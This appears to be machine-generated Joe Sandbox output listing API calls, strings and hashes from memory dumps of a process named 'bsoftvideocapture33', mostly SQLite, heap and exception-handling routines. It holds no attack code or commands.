                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastconnect
                                                                                                                                        • String ID: 3'
                                                                                                                                        • API String ID: 374722065-280543908
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_aggregate_context.SQLITE3 ref: 60914096
                                                                                                                                        • sqlite3_value_numeric_type.SQLITE3 ref: 609140A2
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_aggregate_contextsqlite3_value_numeric_type
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3265351223-3916222277
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_stricmp
                                                                                                                                        • String ID: log
                                                                                                                                        • API String ID: 912767213-2403297477
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0396A
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C039C1
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C09623: __EH_prolog.LIBCMT ref: 02C09628
                                                                                                                                          • Part of subcall function 02C09623: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C09637
                                                                                                                                          • Part of subcall function 02C09623: __CxxThrowException@8.LIBCMT ref: 02C09656
                                                                                                                                        Strings
                                                                                                                                        • Day of month is not valid for year, xrefs: 02C039AC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Day of month is not valid for year
                                                                                                                                        • API String ID: 1404951899-1521898139
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_strnicmp
                                                                                                                                        • String ID: SQLITE_
                                                                                                                                        • API String ID: 1961171630-787686576
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_value_bytes.SQLITE3 ref: 6091A1DB
                                                                                                                                        • sqlite3_value_blob.SQLITE3 ref: 6091A1FA
                                                                                                                                        Strings
                                                                                                                                        • Invalid argument to rtreedepth(), xrefs: 6091A1E3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_value_blobsqlite3_value_bytes
                                                                                                                                        • String ID: Invalid argument to rtreedepth()
                                                                                                                                        • API String ID: 1063208240-2843521569
                                                                                                                                        • Opcode ID: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                                                        • Instruction ID: c9489564a96cd83e586e3a08c251b8a8c74d553169181c25a19da25ffef599d7
                                                                                                                                        • Opcode Fuzzy Hash: 11a8b631faa983fdd1b04a57150add771201859657fb9a8a7ca9793758d49f10
                                                                                                                                        • Instruction Fuzzy Hash: 0FF0A4B2A0C2589BDB00AF2CC88255577A6FF24258F1045D9E9858F306EB34DDD5C7D1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561D7
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_initialize.SQLITE3 ref: 6092A450
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_enter.SQLITE3 ref: 6092A466
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_mutex_leave.SQLITE3 ref: 6092A47F
                                                                                                                                          • Part of subcall function 6092A43E: sqlite3_memory_used.SQLITE3 ref: 6092A4BA
                                                                                                                                        • sqlite3_soft_heap_limit64.SQLITE3 ref: 609561EB
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_soft_heap_limit64$sqlite3_initializesqlite3_memory_usedsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                                                        • String ID: soft_heap_limit
                                                                                                                                        • API String ID: 1251656441-405162809
                                                                                                                                        • Opcode ID: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                                                        • Instruction ID: 8891d4bbc0f5aef5547f00e3070395c34840fc2012d087b050684f6162b0ba7d
                                                                                                                                        • Opcode Fuzzy Hash: 0a3178e3d5348c0d1dba646aca47308acc52713326f376e4eba91e5107f5ba07
                                                                                                                                        • Instruction Fuzzy Hash: C2014B71A083188BC710EF98D8417ADB7F2BFA5318F508629E8A49B394D730DC42CF41
                                                                                                                                        APIs
                                                                                                                                        • std::exception::exception.LIBCMT ref: 02C0EB1C
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 02C0EB31
                                                                                                                                          • Part of subcall function 02C127C5: _malloc.LIBCMT ref: 02C127DD
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 4063778783-2104205924
                                                                                                                                        • Opcode ID: ccb465003c583449fe33ae32e7af4e083687f1a2f679bcc3c7dee3a2a3de3046
                                                                                                                                        • Instruction ID: efb6899d1f74b6821e2a76dc8c02cfba02d90c113cd44433b1570aa09cd49581
                                                                                                                                        • Opcode Fuzzy Hash: ccb465003c583449fe33ae32e7af4e083687f1a2f679bcc3c7dee3a2a3de3046
                                                                                                                                        • Instruction Fuzzy Hash: FEF027B0600319ABEF04E6A8DC859EF73FC9F40604B100469E612E36C0FF70EA149A95
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03C1B
                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 02C03C30
                                                                                                                                          • Part of subcall function 02C114C7: std::exception::exception.LIBCMT ref: 02C114D1
                                                                                                                                          • Part of subcall function 02C0965C: __EH_prolog.LIBCMT ref: 02C09661
                                                                                                                                          • Part of subcall function 02C0965C: __CxxThrowException@8.LIBCMT ref: 02C0968A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                                                                        • String ID: bad cast
                                                                                                                                        • API String ID: 1300498068-3145022300
                                                                                                                                        • Opcode ID: 1de363854d9984d18a37f3570e6dac58714a203877e31c09d2bccb72dcbefa14
                                                                                                                                        • Instruction ID: feeaf740cda108bce5825f38d14728d38372ec8c6a7c7c10bc2e3e570d6387e1
                                                                                                                                        • Opcode Fuzzy Hash: 1de363854d9984d18a37f3570e6dac58714a203877e31c09d2bccb72dcbefa14
                                                                                                                                        • Instruction Fuzzy Hash: BAF0A772900544CBC709DF58D4417EAB775EF52711F1001AEED0957241CB729A49DAD1
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 6092522A
                                                                                                                                        • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6094A57F), ref: 60925263
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_log
                                                                                                                                        • String ID: NULL
                                                                                                                                        • API String ID: 632333372-324932091
                                                                                                                                        • Opcode ID: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                                                        • Instruction ID: 5a36de60e8574ea04015b231464f09686a41744340efbe7a8a869d8181b3dc96
                                                                                                                                        • Opcode Fuzzy Hash: f56f6a0e8a895df1b0101c46b9851dc3af9ce5b0d95800d46be4b721d61d1ab1
                                                                                                                                        • Instruction Fuzzy Hash: BAF0A070238301DBD7102FA6E44230E7AEBABB0798F48C43C95A84F289D7B5C844CB63
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C038D2
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C038F1
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        Strings
                                                                                                                                        • Year is out of valid range: 1400..10000, xrefs: 02C038E0
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Year is out of valid range: 1400..10000
                                                                                                                                        • API String ID: 3258419250-2344417016
                                                                                                                                        • Opcode ID: d000f4b3bad371bb63ffc0b80b032972fa238d271feedef8bd7cd1fd2252aaf3
                                                                                                                                        • Instruction ID: 460318048f2ddcae682a1e71588eefd9adba6361ebb4d92ec2448a5af1c8c50c
                                                                                                                                        • Opcode Fuzzy Hash: d000f4b3bad371bb63ffc0b80b032972fa238d271feedef8bd7cd1fd2252aaf3
                                                                                                                                        • Instruction Fuzzy Hash: 50E0D872E402249BEB14EBD8C9517DDB779EB08720F04045EEC05776C0DEB52948DBD1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C03886
                                                                                                                                        • std::runtime_error::runtime_error.LIBCPMT ref: 02C038A5
                                                                                                                                          • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
                                                                                                                                          • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
                                                                                                                                        Strings
                                                                                                                                        • Day of month value is out of range 1..31, xrefs: 02C03894
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                                                                        • String ID: Day of month value is out of range 1..31
                                                                                                                                        • API String ID: 3258419250-1361117730
                                                                                                                                        • Opcode ID: 3a367318bbd0030047930253121e95c9a7d3d2c0c18597bbb37b24498d7d2837
                                                                                                                                        • Instruction ID: b9b113a99d0f4f580204263facb7d66f9a274f97103c41c5c3d00e7ed20bed7a
                                                                                                                                        • Opcode Fuzzy Hash: 3a367318bbd0030047930253121e95c9a7d3d2c0c18597bbb37b24498d7d2837
                                                                                                                                        • Instruction Fuzzy Hash: 68E0D8B2E4022497E714EBD8C8517DDB779DB08B20F00089EEC02776C0DEB62948DBD1
                                                                                                                                        APIs
                                                                                                                                        • __EH_prolog.LIBCMT ref: 02C0391E
• std::runtime_error::runtime_error.LIBCPMT ref: 02C0393D
  • Part of subcall function 02C01410: std::exception::exception.LIBCMT ref: 02C01428
  • Part of subcall function 02C07991: _memmove.LIBCMT ref: 02C079B1
Strings
• Month number is out of range 1..12, xrefs: 02C0392C
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
• String ID: Month number is out of range 1..12
• API String ID: 3258419250-4198407886
• Opcode ID: bb5abc2b2485e62ae397361d0216075e02a829e8d31ed40f14cee3517998dfc4
• Instruction ID: 409b194623bb969942d067df54dd44b18fc2d37ba5955b983c35da7b74019e48
• Opcode Fuzzy Hash: bb5abc2b2485e62ae397361d0216075e02a829e8d31ed40f14cee3517998dfc4
• Instruction Fuzzy Hash: A2E0D872E4022497E724ABE8CC517EDB779EB08720F00045EEC01776C0DEB52948DBD1

APIs
• TlsAlloc.KERNEL32 ref: 02C019CC
• GetLastError.KERNEL32 ref: 02C019D9
  • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: AllocErrorH_prologLast
• String ID: tss
• API String ID: 249634027-1638339373
• Opcode ID: aa65ee8021a783825c1cf464431a48977ef282744b3119fb8f8883ae9ebc5463
• Instruction ID: f4c79652417472e32b6bda48245bff5a86ba356431dbe9eea510a85d77d01494
• Opcode Fuzzy Hash: aa65ee8021a783825c1cf464431a48977ef282744b3119fb8f8883ae9ebc5463
• Instruction Fuzzy Hash: EEE08672D142205BC2107B78AC4818FBB949B41271F108B2AECAD832D0EE7059559BC6

APIs
• __EH_prolog.LIBCMT ref: 02C03BD8
• std::bad_exception::bad_exception.LIBCMT ref: 02C03BED
  • Part of subcall function 02C114C7: std::exception::exception.LIBCMT ref: 02C114D1
  • Part of subcall function 02C0965C: __EH_prolog.LIBCMT ref: 02C09661
  • Part of subcall function 02C0965C: __CxxThrowException@8.LIBCMT ref: 02C0968A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
• String ID: bad cast
• API String ID: 1300498068-3145022300
• Opcode ID: 0a4fea98176e15716c4820deb64685cb518f81d486ae65006a1ec5c29b2ba816
• Instruction ID: dc0d97a4fa2052c59e5177e9c020c3aa742b49045d5aff12f0732c049a938c3d
• Opcode Fuzzy Hash: 0a4fea98176e15716c4820deb64685cb518f81d486ae65006a1ec5c29b2ba816
• Instruction Fuzzy Hash: B2E0DFB1900148DBC704EF94C442BBCBB75EF11704F0040AC9D0A13290CF354A08DE82

APIs
• HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404608
• HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040463C
• VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 00404656
• HeapFree.KERNEL32(00000000,?,?,00000000,004043A8,?,?,?,00000100,?,00000000), ref: 0040466D
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: AllocHeap$FreeVirtual
• String ID:
• API String ID: 3499195154-0
• Opcode ID: 2becd6c8e06833c8a4915773bf629a422f484b6d9e0f9157989f7b9aaac48440
• Instruction ID: acd6d4547551bc59350702e4efe52eaae0a18fdbbc3be1f7c52cca1e76f34e40
• Opcode Fuzzy Hash: 2becd6c8e06833c8a4915773bf629a422f484b6d9e0f9157989f7b9aaac48440
• Instruction Fuzzy Hash: 35115E70210701DFC7208F28EE85A127BB5FB857207108A3DFA95E65F0D7769845DB08

APIs
• EnterCriticalSection.KERNEL32(?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4DF
• TlsGetValue.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4F5
• GetLastError.KERNEL32(?,?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D4FD
• LeaveCriticalSection.KERNEL32(?,?,?,?,6096D655,?,?,?,?,?,6096CF88), ref: 6096D520
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: CriticalSection$EnterErrorLastLeaveValue
• String ID:
• API String ID: 682475483-0
• Opcode ID: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction ID: 6dd43474153c21470d2d90641e64b96ed0da30414b2d41baa8b5e8831fa3fcb2
• Opcode Fuzzy Hash: 79e4c3a08b5363d98cc33068bb7bbdcd271105d9d9d9c252471cf05fac27a945
• Instruction Fuzzy Hash: 9AF0F972A163104BEB10AF659CC1A5A7BFDEFB1218F100048FC6197354E770DC40D6A2